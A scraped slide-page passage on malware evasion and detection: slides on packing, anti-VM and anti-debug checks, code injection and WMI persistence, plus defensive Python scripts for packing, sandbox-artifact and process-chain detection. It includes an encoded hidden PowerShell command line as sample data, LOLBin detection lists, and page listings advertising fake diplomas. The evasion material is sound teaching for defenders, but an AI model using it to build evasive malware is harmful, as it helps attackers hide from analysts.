CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
Sam Bowne
 
Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment
isc2-hellenic
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Teymur Kheirkhabarov
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Sergey Soldatov
 
Logging for hackers SAINTCON
Logging for hackers SAINTCONLogging for hackers SAINTCON
Logging for hackers SAINTCON
Michael Gough
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
GIBIN JOHN
 
Logging for Hackers - What you need to know to catch them
Logging for Hackers - What you need to know to catch themLogging for Hackers - What you need to know to catch them
Logging for Hackers - What you need to know to catch them
Michael Gough
 
Anomalies Detection: Windows OS - Part 1
Anomalies Detection: Windows OS - Part 1Anomalies Detection: Windows OS - Part 1
Anomalies Detection: Windows OS - Part 1
Rhydham Joshi
 
Anomalies Detection: Windows OS - Part 1
Anomalies Detection: Windows OS - Part 1Anomalies Detection: Windows OS - Part 1
Anomalies Detection: Windows OS - Part 1
Rhydham Joshi
 
Deeplook into apt and how to detect and defend v1.0
Deeplook into apt and how to detect and defend v1.0Deeplook into apt and how to detect and defend v1.0
Deeplook into apt and how to detect and defend v1.0
Michael Gough
 
12 Investigating Windows Systems (Part 2 of 3)
12 Investigating Windows Systems (Part 2 of 3)12 Investigating Windows Systems (Part 2 of 3)
12 Investigating Windows Systems (Part 2 of 3)
Sam Bowne
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
Will Schroeder
 
CNIT 152 12 Investigating Windows Systems (Part 2)
CNIT 152 12 Investigating Windows Systems (Part 2)CNIT 152 12 Investigating Windows Systems (Part 2)
CNIT 152 12 Investigating Windows Systems (Part 2)
Sam Bowne
 
Forensics perspective ERFA-møde marts 2017
 Forensics perspective ERFA-møde marts 2017 Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017
J Hartig
 
Proper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoSProper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoS
Michael Gough
 
Proper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoSProper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoS
Michael Gough
 
Logging for Hackers v1.0
Logging for Hackers v1.0Logging for Hackers v1.0
Logging for Hackers v1.0
Michael Gough
 

Similar to Let's Talk Technical: Malware Evasion and Detection (20)

BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
Logs, Logs, Logs - What you need to know to catch a thief
Logs, Logs, Logs - What you need to know to catch a thiefLogs, Logs, Logs - What you need to know to catch a thief
Logs, Logs, Logs - What you need to know to catch a thief
 
CNIT 152: 12b Windows Registry
CNIT 152: 12b Windows RegistryCNIT 152: 12b Windows Registry
CNIT 152: 12b Windows Registry
 
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
 
Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Logging for hackers SAINTCON
Logging for hackers SAINTCONLogging for hackers SAINTCON
Logging for hackers SAINTCON
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
Logging for Hackers - What you need to know to catch them
Logging for Hackers - What you need to know to catch themLogging for Hackers - What you need to know to catch them
Logging for Hackers - What you need to know to catch them
 
Anomalies Detection: Windows OS - Part 1
Anomalies Detection: Windows OS - Part 1Anomalies Detection: Windows OS - Part 1
Anomalies Detection: Windows OS - Part 1
 
Anomalies Detection: Windows OS - Part 1
Anomalies Detection: Windows OS - Part 1Anomalies Detection: Windows OS - Part 1
Anomalies Detection: Windows OS - Part 1
 
Deeplook into apt and how to detect and defend v1.0
Deeplook into apt and how to detect and defend v1.0Deeplook into apt and how to detect and defend v1.0
Deeplook into apt and how to detect and defend v1.0
 
12 Investigating Windows Systems (Part 2 of 3)
12 Investigating Windows Systems (Part 2 of 3)12 Investigating Windows Systems (Part 2 of 3)
12 Investigating Windows Systems (Part 2 of 3)
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
CNIT 152 12 Investigating Windows Systems (Part 2)
CNIT 152 12 Investigating Windows Systems (Part 2)CNIT 152 12 Investigating Windows Systems (Part 2)
CNIT 152 12 Investigating Windows Systems (Part 2)
 
Forensics perspective ERFA-møde marts 2017
 Forensics perspective ERFA-møde marts 2017 Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017
 
Proper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoSProper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoS
 
Proper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoSProper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoS
 
Logging for Hackers v1.0
Logging for Hackers v1.0Logging for Hackers v1.0
Logging for Hackers v1.0
 

Recently uploaded

一比一原版南十字星大学毕业证(SCU毕业证书)学历如何办理
一比一原版南十字星大学毕业证(SCU毕业证书)学历如何办理一比一原版南十字星大学毕业证(SCU毕业证书)学历如何办理
一比一原版南十字星大学毕业证(SCU毕业证书)学历如何办理
slg6lamcq
 
社内勉強会資料_Hallucination of LLMs               .
社内勉強会資料_Hallucination of LLMs               .社内勉強会資料_Hallucination of LLMs               .
社内勉強会資料_Hallucination of LLMs               .
NABLAS株式会社
 
Orchestrating the Future: Navigating Today's Data Workflow Challenges with Ai...
Orchestrating the Future: Navigating Today's Data Workflow Challenges with Ai...Orchestrating the Future: Navigating Today's Data Workflow Challenges with Ai...
Orchestrating the Future: Navigating Today's Data Workflow Challenges with Ai...
Kaxil Naik
 
Open Source Contributions to Postgres: The Basics POSETTE 2024
Open Source Contributions to Postgres: The Basics POSETTE 2024Open Source Contributions to Postgres: The Basics POSETTE 2024
Open Source Contributions to Postgres: The Basics POSETTE 2024
ElizabethGarrettChri
 
一比一原版(曼大毕业证书)曼尼托巴大学毕业证如何办理
一比一原版(曼大毕业证书)曼尼托巴大学毕业证如何办理一比一原版(曼大毕业证书)曼尼托巴大学毕业证如何办理
一比一原版(曼大毕业证书)曼尼托巴大学毕业证如何办理
ytypuem
 
DSSML24_tspann_CodelessGenerativeAIPipelines
DSSML24_tspann_CodelessGenerativeAIPipelinesDSSML24_tspann_CodelessGenerativeAIPipelines
DSSML24_tspann_CodelessGenerativeAIPipelines
Timothy Spann
 
一比一原版格里菲斯大学毕业证(Griffith毕业证书)学历如何办理
一比一原版格里菲斯大学毕业证(Griffith毕业证书)学历如何办理一比一原版格里菲斯大学毕业证(Griffith毕业证书)学历如何办理
一比一原版格里菲斯大学毕业证(Griffith毕业证书)学历如何办理
lzdvtmy8
 
Jio cinema Retention & Engagement Strategy.pdf
Jio cinema Retention & Engagement Strategy.pdfJio cinema Retention & Engagement Strategy.pdf
Jio cinema Retention & Engagement Strategy.pdf
inaya7568
 
University of New South Wales degree offer diploma Transcript
University of New South Wales degree offer diploma TranscriptUniversity of New South Wales degree offer diploma Transcript
University of New South Wales degree offer diploma Transcript
soxrziqu
 
一比一原版美国帕森斯设计学院毕业证(parsons毕业证书)如何办理
一比一原版美国帕森斯设计学院毕业证(parsons毕业证书)如何办理一比一原版美国帕森斯设计学院毕业证(parsons毕业证书)如何办理
一比一原版美国帕森斯设计学院毕业证(parsons毕业证书)如何办理
asyed10
 
一比一原版(UO毕业证)渥太华大学毕业证如何办理
一比一原版(UO毕业证)渥太华大学毕业证如何办理一比一原版(UO毕业证)渥太华大学毕业证如何办理
一比一原版(UO毕业证)渥太华大学毕业证如何办理
bmucuha
 
一比一原版卡尔加里大学毕业证(uc毕业证)如何办理
一比一原版卡尔加里大学毕业证(uc毕业证)如何办理一比一原版卡尔加里大学毕业证(uc毕业证)如何办理
一比一原版卡尔加里大学毕业证(uc毕业证)如何办理
oaxefes
 
4th Modern Marketing Reckoner by MMA Global India & Group M: 60+ experts on W...
4th Modern Marketing Reckoner by MMA Global India & Group M: 60+ experts on W...4th Modern Marketing Reckoner by MMA Global India & Group M: 60+ experts on W...
4th Modern Marketing Reckoner by MMA Global India & Group M: 60+ experts on W...
Social Samosa
 
Building a Quantum Computer Neutral Atom.pdf
Building a Quantum Computer Neutral Atom.pdfBuilding a Quantum Computer Neutral Atom.pdf
Building a Quantum Computer Neutral Atom.pdf
cjimenez2581
 
一比一原版(Sheffield毕业证书)谢菲尔德大学毕业证如何办理
一比一原版(Sheffield毕业证书)谢菲尔德大学毕业证如何办理一比一原版(Sheffield毕业证书)谢菲尔德大学毕业证如何办理
一比一原版(Sheffield毕业证书)谢菲尔德大学毕业证如何办理
1tyxnjpia
 
Cell The Unit of Life for NEET Multiple Choice Questions.docx
Cell The Unit of Life for NEET Multiple Choice Questions.docxCell The Unit of Life for NEET Multiple Choice Questions.docx
Cell The Unit of Life for NEET Multiple Choice Questions.docx
vasanthatpuram
 
Build applications with generative AI on Google Cloud
Build applications with generative AI on Google CloudBuild applications with generative AI on Google Cloud
Build applications with generative AI on Google Cloud
Márton Kodok
 
End-to-end pipeline agility - Berlin Buzzwords 2024
End-to-end pipeline agility - Berlin Buzzwords 2024End-to-end pipeline agility - Berlin Buzzwords 2024
End-to-end pipeline agility - Berlin Buzzwords 2024
Lars Albertsson
 
UofT毕业证如何办理
UofT毕业证如何办理UofT毕业证如何办理
UofT毕业证如何办理
exukyp
 
原版制作(unimelb毕业证书)墨尔本大学毕业证Offer一模一样
原版制作(unimelb毕业证书)墨尔本大学毕业证Offer一模一样原版制作(unimelb毕业证书)墨尔本大学毕业证Offer一模一样
原版制作(unimelb毕业证书)墨尔本大学毕业证Offer一模一样
ihavuls
 

Recently uploaded (20)

一比一原版南十字星大学毕业证(SCU毕业证书)学历如何办理
一比一原版南十字星大学毕业证(SCU毕业证书)学历如何办理一比一原版南十字星大学毕业证(SCU毕业证书)学历如何办理
一比一原版南十字星大学毕业证(SCU毕业证书)学历如何办理
 
社内勉強会資料_Hallucination of LLMs               .
社内勉強会資料_Hallucination of LLMs               .社内勉強会資料_Hallucination of LLMs               .
社内勉強会資料_Hallucination of LLMs               .
 
Orchestrating the Future: Navigating Today's Data Workflow Challenges with Ai...
Orchestrating the Future: Navigating Today's Data Workflow Challenges with Ai...Orchestrating the Future: Navigating Today's Data Workflow Challenges with Ai...
Orchestrating the Future: Navigating Today's Data Workflow Challenges with Ai...
 
Open Source Contributions to Postgres: The Basics POSETTE 2024
Open Source Contributions to Postgres: The Basics POSETTE 2024Open Source Contributions to Postgres: The Basics POSETTE 2024
Open Source Contributions to Postgres: The Basics POSETTE 2024
 
一比一原版(曼大毕业证书)曼尼托巴大学毕业证如何办理
一比一原版(曼大毕业证书)曼尼托巴大学毕业证如何办理一比一原版(曼大毕业证书)曼尼托巴大学毕业证如何办理
一比一原版(曼大毕业证书)曼尼托巴大学毕业证如何办理
 
DSSML24_tspann_CodelessGenerativeAIPipelines
DSSML24_tspann_CodelessGenerativeAIPipelinesDSSML24_tspann_CodelessGenerativeAIPipelines
DSSML24_tspann_CodelessGenerativeAIPipelines
 
Let's Talk Technical: Malware Evasion and Detection

Static Evasion - Packing
• .EXEs / .DLLs = PACKED
• Packing is a subset/type of obfuscation
  • Compression
  • VMProtect, Themida, Armadillo, etc…
• High entropy / low import count
• Weird static properties
• APIs typical of an unpacking stub:
  • LoadLibrary
  • GetProcAddress
  • VirtualAlloc
  • RtlDecompressBuffer
• Hides the functionality of the malware
  • Hides strings, imports, etc…
• Evades AV

Static Evasion - Obfuscation
• Non-PE malware is technically not packed, but obfuscated:
  • Garbage code
  • Pointless arithmetic
  • Concatenation of important strings at runtime
  • Randomized variable names
  • Unused variables/functions
  • Multiple layers/languages
  • Replace(), Chr(), Vbkey()
  • Simple encoding (XOR, Base64, Hex)
  • Compression (PowerShell)
  • Randomized order of functions
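The packing slide gives two static indicators, high entropy and a low import count, plus the short list of APIs an unpacking stub needs. The script below is an added example (not code from the talk) that turns those indicators into a scoring function and runs it over constructed section data. The thresholds, the section bytes and the import lists are assumptions built inline so the example runs offline; on a real sample you would feed in section bytes and the import table from a PE parser such as pefile.

```python
"""Added example (not from the talk): the "high entropy / low import count"
packing heuristic from the slide, run over constructed section data.
Real use would read section bytes and the import table with pefile;
here sample sections are built inline so it runs offline."""
import math
import random
from collections import Counter

# Thresholds are assumptions for illustration, not published cut-offs.
HIGH_ENTROPY = 7.0        # bits per byte; 8.0 is uniformly random data
LOW_IMPORT_COUNT = 10     # packed stubs often import only a handful of APIs
STUB_APIS = {"LoadLibraryA", "LoadLibraryW", "GetProcAddress",
             "VirtualAlloc", "VirtualProtect", "RtlDecompressBuffer"}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def packing_score(sections: dict, imports: list) -> dict:
    """Combine the slide's static indicators into a verdict.

    sections: {name: raw bytes}; imports: list of imported API names.
    Returns per-section entropy plus the indicators that fired."""
    entropies = {name: round(shannon_entropy(data), 2) for name, data in sections.items()}
    indicators = []
    high = [n for n, e in entropies.items() if e >= HIGH_ENTROPY]
    if high:
        indicators.append(f"high-entropy sections: {', '.join(high)}")
    if len(imports) <= LOW_IMPORT_COUNT:
        indicators.append(f"low import count: {len(imports)}")
    stub = STUB_APIS.intersection(imports)
    if {"LoadLibraryA", "LoadLibraryW"} & stub and "GetProcAddress" in stub:
        indicators.append("runtime import resolution (LoadLibrary + GetProcAddress)")
    return {"entropy": entropies, "indicators": indicators,
            "likely_packed": len(indicators) >= 2}


def build_samples() -> tuple:
    """Constructed sections: a deterministic pseudo-random blob stands in
    for a compressed/encrypted section, repetitive text for plain code."""
    rng = random.Random(1337)
    packed = {".text": bytes(rng.getrandbits(8) for _ in range(4096)),
              ".rsrc": b"RSRC" * 256}
    plain = {".text": b"mov eax, ebx; push ebp; ret; " * 200,
             ".data": b"Hello from a normal program\x00" * 50}
    return packed, plain


if __name__ == "__main__":
    packed, plain = build_samples()
    print(packing_score(packed, ["LoadLibraryA", "GetProcAddress", "VirtualAlloc"]))
    print(packing_score(plain, [f"api{i}" for i in range(40)] + ["CreateFileW"]))
```

Entropy alone is a weak signal (compressed resources, certificates and .NET assemblies all score high), which is why the verdict requires two indicators to agree; the import-resolution check is the one that most often separates a packer stub from merely compressed data.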
Trojanization
• Masquerading as a system process:
  • svchost.exe running out of AppData
• Running as a service:
  • Background service
  • svchost.exe loading a malicious DLL
• Masquerading as downloaded software

Environment-aware: Process activity
• FindWindow API call
• GetModuleHandle
• List running processes and compare:
  1. Get a process listing: CreateToolhelp32Snapshot, EnumProcesses
  2. Iterate through the list of processes: Process32First, Process32Next
  3. Compare the process names against a list of known analysis tooling
• Virtualization:
  • VBoxService.exe, vmtoolsd.exe, vmwareuser.exe
• Malware lab:
  • procmon.exe, procexp.exe, wireshark.exe
• Debuggers:
  • ollydbg.exe, windbg.exe, x64dbg.exe
Environment-aware: File System / Registry
Query Registry:
• Virtualization:
  • HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0, value "Identifier" contains "VMWARE"
  • HKLM\SOFTWARE\VMware, Inc.\VMware Tools
  • HKLM\HARDWARE\Description\System, value "SystemBiosVersion" contains "VMWARE"
  • HKLM\HARDWARE\Description\System, value "SystemBiosVersion" contains "VBOX"
  • HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions
  • HKLM\HARDWARE\ACPI\DSDT\VBOX__
• Malware lab:
  • Residue from non-standalone tools
Traverse File System:
• Virtualization:
  • C:\WINDOWS\system32\drivers\VBoxMouse.sys
  • C:\WINDOWS\system32\vboxhook.dll
  • C:\WINDOWS\system32\vboxdisp.dll
  • C:\Windows\system32\drivers\vmmouse.sys
  • C:\Windows\system32\drivers\vmhgfs.sys
• Malware lab:
  • Installation files, dependencies, DLLs
  • Wireshark, Process Hacker, etc…
• Sandbox:
  • Lack of data on the file system
• AV:
  • Installation files, dependencies, DLLs

Hardware
• Detect virtualization/lab/sandbox:
  • Common MAC address OUIs (first three bytes):
    • VirtualBox - 08:00:27
    • VMware - 00:0C:29, 00:1C:14, 00:50:56, or 00:05:69
  • Check RAM/cores:
    • Too few cores or too little RAM suggests a sandbox; the malware may exit
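The three environment-aware slides above list the process names, file paths, registry values and MAC OUIs malware compares against. Defenders can run the same comparisons in reverse to find out which of those artifacts their own sandbox exposes. The script below is an added example (not code from the talk) that does that over a constructed inventory of a VM; the inventory dict, the thresholds for "too small a machine" and the exact process/file lists are assumptions, and on a live Windows host they would be gathered with psutil, os.path.exists and winreg.

```python
"""Added example (not from the talk): the process-name, file, registry,
MAC-OUI and hardware checks listed on the preceding slides, implemented
as an audit a sandbox operator can run against an inventory of a VM.
The inventory below is constructed; on a live host you would gather it
with psutil, os.path.exists, winreg and a cores/RAM query."""

VM_PROCESSES = {"vboxservice.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwareuser.exe"}
LAB_PROCESSES = {"procmon.exe", "procexp.exe", "wireshark.exe", "processhacker.exe"}
DEBUGGERS = {"ollydbg.exe", "windbg.exe", "x64dbg.exe", "x32dbg.exe", "immunitydebugger.exe"}

VM_FILES = {
    r"C:\Windows\system32\drivers\VBoxMouse.sys",
    r"C:\Windows\system32\vboxhook.dll",
    r"C:\Windows\system32\vboxdisp.dll",
    r"C:\Windows\system32\drivers\vmmouse.sys",
    r"C:\Windows\system32\drivers\vmhgfs.sys",
}
# Registry values malware inspects: (key, value name, substring looked for).
VM_REGISTRY = [
    (r"HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0",
     "Identifier", "VMWARE"),
    (r"HKLM\HARDWARE\Description\System", "SystemBiosVersion", "VMWARE"),
    (r"HKLM\HARDWARE\Description\System", "SystemBiosVersion", "VBOX"),
]
# OUIs from the slide; the first three bytes of the MAC identify the vendor.
MAC_OUIS = {"08:00:27": "VirtualBox", "00:0C:29": "VMware", "00:1C:14": "VMware",
            "00:50:56": "VMware", "00:05:69": "VMware"}
# Assumed "too small to be a real workstation" thresholds.
MIN_CORES, MIN_RAM_GB = 2, 4


def mac_vendor(mac: str):
    """Return the virtualization vendor for a MAC address, or None."""
    oui = mac.upper().replace("-", ":")[:8]
    return MAC_OUIS.get(oui)


def audit_environment(inventory: dict) -> list:
    """Return one finding per artifact that malware could use to spot the lab."""
    findings = []
    procs = {p.lower() for p in inventory.get("processes", [])}
    for label, names in (("virtualization process", VM_PROCESSES),
                         ("analysis tool", LAB_PROCESSES),
                         ("debugger", DEBUGGERS)):
        for hit in sorted(procs & names):
            findings.append(f"{label} running: {hit}")
    present = {f.lower() for f in inventory.get("files", [])}
    for path in sorted(VM_FILES):
        if path.lower() in present:
            findings.append(f"VM driver/DLL on disk: {path}")
    reg = inventory.get("registry", {})
    for key, name, needle in VM_REGISTRY:
        if needle in reg.get((key, name), "").upper():
            findings.append(f"registry {key}\\{name} contains {needle}")
    for mac in inventory.get("macs", []):
        vendor = mac_vendor(mac)
        if vendor:
            findings.append(f"MAC {mac} has {vendor} OUI")
    if inventory.get("cores", MIN_CORES) < MIN_CORES:
        findings.append(f"only {inventory['cores']} CPU core(s)")
    if inventory.get("ram_gb", MIN_RAM_GB) < MIN_RAM_GB:
        findings.append(f"only {inventory['ram_gb']} GB RAM")
    return findings


# Constructed inventory of a poorly hardened analysis VM.
SAMPLE_INVENTORY = {
    "processes": ["explorer.exe", "VBoxService.exe", "procmon.exe", "x64dbg.exe"],
    "files": [r"C:\Windows\system32\drivers\VBoxMouse.sys"],
    "registry": {(r"HKLM\HARDWARE\Description\System", "SystemBiosVersion"): "VBOX   - 1"},
    "macs": ["08:00:27:4E:66:A1"],
    "cores": 1,
    "ram_gb": 2,
}

if __name__ == "__main__":
    for finding in audit_environment(SAMPLE_INVENTORY):
        print("[!]", finding)
```

Every finding is something a sample can check with a handful of API calls before it decides to run, so the list doubles as the hardening checklist for the sandbox: rename or stop the tools, spoof the OUI, give the VM realistic resources, and re-run the audit until it comes back empty.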
Sandbox
• Detect sandbox:
  • Check system time
  • Successful internet access
    • HttpSendRequest -> google.com
  • Mouse/keyboard activity
  • Empty clipboard
  • Sleep loop
  • Malware name
    • Some sandboxes name the sample after its hash when executing
    • Some sandboxes name it malware.exe

Debuggers
• Detect debuggers:
  • Timing:
    • GetTickCount: if (GetTickCount2 - GetTickCount1 > x) { EXIT }
    • GetSystemTime: if (GetSystemTime2 - GetSystemTime1 > x) { EXIT }
  • WinAPI calls:
    • IsDebuggerPresent, OutputDebugString, CheckRemoteDebuggerPresent, NtQueryInformationProcess
  • Manually checking flags within data structures:
    • PEB.BeingDebugged: fs:[0x30] + 0x2 (x86) / gs:[0x60] + 0x2 (x64)
    • SeDebugPrivilege flag
  • Check running processes for common debuggers:
    • ollydbg, x64dbg, immunity, etc…
  • FindWindow:
    • Window class/title of ollydbg, x64dbg, etc…
  • Abuse of the Structured Exception Handler
  • TLS callback functions
  • The Red Pill

Miscellaneous Evasion
• Cleaning up after itself:
  • Config files, dependencies, residue, artifacts, itself, timestomping, etc…
• Evading signatures:
  • Randomly generated filenames or registry values
  • DGA - Domain Generation Algorithm
    • Client/server-side
• Hash or refer to sections of itself to detect tampering:
  • arguments.callee in JS
  • PEs that hash sections of their own code
• Hide from Task Manager/tasklist:
  • Unlink its own entry from the doubly linked list -> PsActiveProcessHead
• Behavior dependent on other running processes:
  • E.g. coinminer looking for Task Manager
• DLL Load Order Hijacking
Code injection
• Different flavors:
  • Process hollowing + injection:
    • CreateProcess (suspended)… CreationFlag = 0x00000004 (CREATE_SUSPENDED)
    • NtUnmapViewOfSection…
    • WriteProcessMemory…
    • ResumeThread…
  • DLL injection:
    • VirtualAllocEx
    • WriteProcessMemory
    • CreateRemoteThread
    • LoadLibrary (as the remote thread's start routine)
  • API hooking:
    • Interception/interference of code
    • IAT hooking
    • Inline hooking (trampoline)
  • Shellcode injection
  • Unpacking technique
  • Process Doppelgänging

Process injection infographic: Malware Analysis for Hedgehogs - http://struppigel.blogspot.com/2017/07/process-injection-info-graphic.html

Evasion in transit
• Blending in with expected traffic:
  • Heavily used ports (53, 80, 443)
  • Benign-looking User-Agent
• Less monitored by tools:
  • DNS is common for phoning home
• Hiding comms:
  • Encryption
  • XOR
  • Simple encoding
• DGA
• C2 redundancy:
  • Referrer loops through domains until a 200 response
  • https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF
Fileless…ish malware
• Payload in the registry
• Scripts passed to native Windows executables
• No files dropped to the file system
• PowerShell / JS
• WinAPI abuse
  • Inject shellcode
• Uses Run keys for persistence
• Examples:
  • Kovter
  • Poweliks
  • Misfox

Fileless……………ish malware cont'd
• WMI
  • Payload in the WMI repository
  • No files dropped to the file system
  • Persists across reboots
  • AV/EDRs that do not inspect the WMI repository will not see it
  • Persistence = permanent event subscription (root\subscription)
  • Requires:
    • __EventFilter (trigger / condition)
    • __EventConsumer (action / payload)
    • __FilterToConsumerBinding (binds the two)
• Examples:
  • POSHSPY
  • HAMMERTOSS

Detecting Delivery - host
• Most common delivery methods:
  • Malicious email attachment
  • Drive-by download
• Parent/child process relationship anomalies:

Email attachment:
• Process chain: Outlook.exe -> winword.exe -> powershell.exe -> malware.exe
• Detection: Office applications spawning powershell.exe, cmd.exe, wscript.exe, etc…
• Tool(s) for detection: Carbon Black, Tanium, Windows Event Logs (4688)

Drive-by download:
• Process chain: iexplore.exe -> malware.exe
• Detection: browser spawning an unexpected process (whitelist)
• Tool(s) for detection: Carbon Black, Tanium, Windows Event Logs (4688)
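The delivery slide reduces to two parent/child rules: an Office application spawning a script host, and a browser spawning anything outside a whitelist. The script below is an added example (not code from the talk) that applies both rules to constructed Event ID 4688 records. The field names mirror the real 4688 event (NewProcessName, ParentProcessName, CommandLine), but the events, the process lists and the browser-child whitelist are assumptions for the example.

```python
"""Added example (not from the talk): the parent/child anomaly rules from
the slide, run over constructed Event ID 4688 records.  Field names mirror
the 4688 event (NewProcessName, ParentProcessName, CommandLine); the
events themselves are made up for the example."""
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
# Children that Office should essentially never spawn.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Assumed whitelist of children a browser legitimately launches.
BROWSER_CHILD_WHITELIST = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe",
                           "ielowutil.exe", "werfault.exe"}


def base(path: str) -> str:
    """Lower-cased file name from a Windows path, portable across hosts."""
    return ntpath.basename(path).lower()


def classify(event: dict):
    """Return (rule, chain) for a suspicious 4688 event, else None."""
    parent, child = base(event["ParentProcessName"]), base(event["NewProcessName"])
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        return ("office-spawns-script-host", f"{parent} -> {child}")
    if parent in BROWSERS and child not in BROWSER_CHILD_WHITELIST:
        return ("browser-spawns-unexpected", f"{parent} -> {child}")
    return None


def triage(events: list) -> list:
    """Apply classify() to every event and keep the hits with context."""
    hits = []
    for ev in events:
        verdict = classify(ev)
        if verdict:
            hits.append({"rule": verdict[0], "chain": verdict[1],
                         "cmdline": ev.get("CommandLine", "")})
    return hits


# Constructed 4688 records: one phishing-attachment chain, one drive-by,
# and two benign events that must not fire.
SAMPLE_EVENTS = [
    {"NewProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "CommandLine": "WINWORD.EXE /n invoice.docm"},
    {"NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"NewProcessName": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "ParentProcessName": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": "update.exe"},
    {"NewProcessName": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentProcessName": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe --type=renderer"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Note that 4688 only carries the parent's name when "Include command line in process creation events" and the newer Creator Process Name field are enabled; without them the same logic has to run on EDR telemetry (Carbon Black, Tanium, Sysmon event 1), which is why the slide lists those tools alongside the event log.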
Detection - network
• User-Agent anomalies:
  • 1-offs
  • Slight deviations from expected UAs
• System processes that shouldn't be calling out:
  • certutil, bitsadmin, regsvr32, mshta, etc…
• Lack of User-Agent
  • Favourite of malware authors = PowerShell Net.WebClient class + Download(File|String) -> blank UA!
• Example UAs:
  • PowerShell Net.WebClient class: (blank)
  • BITSAdmin
  • iexplore.exe: Kovter

Detection: Process Activity
• System processes behaving badly:
  • Running out of the incorrect directory
  • Running under the incorrect parent process
  • Anomalous DLLs
  • Unlinked DLLs
  • Anomalous network connections from system processes
  • DLL Load Order Hijacking
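The "Evasion in transit" slide explains why malware hides behind a benign-looking or missing User-Agent, and the network detection slide lists the four things to look for: blank UAs, one-offs, slight deviations from the fleet's common UAs, and LOLBins that have no business talking to the internet. The script below is an added example (not code from the talk) implementing all four over constructed records. The record shape (process name plus User-Agent per connection, as EDR netconn data or a proxy log joined to process data would give) and the thresholds are assumptions.

```python
"""Added example (not from the talk): the User-Agent rules from the slide
(blank UA, one-offs, slight deviations from common UAs, and LOLBins that
should not talk to the internet) run over constructed records.  The
record shape (process + user_agent per connection) is an assumption."""

LOLBINS = {"certutil.exe", "bitsadmin.exe", "regsvr32.exe", "mshta.exe",
           "rundll32.exe", "powershell.exe"}
DEVIATION_MAX_EDITS = 3   # assumed: a UA within 3 edits of a common one is "slightly off"
COMMON_MIN_COUNT = 3      # assumed: a UA seen on >= 3 hosts is "expected"


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, enough to catch a UA with one character changed."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def detect_ua_anomalies(records: list) -> list:
    """Return (rule, record) pairs for records that match a slide rule."""
    # Count each UA by distinct host so one chatty client cannot make a UA "common".
    ua_hosts = {}
    for r in records:
        ua_hosts.setdefault(r["user_agent"], set()).add(r["host"])
    common = {ua for ua, hosts in ua_hosts.items() if ua and len(hosts) >= COMMON_MIN_COUNT}
    hits = []
    for r in records:
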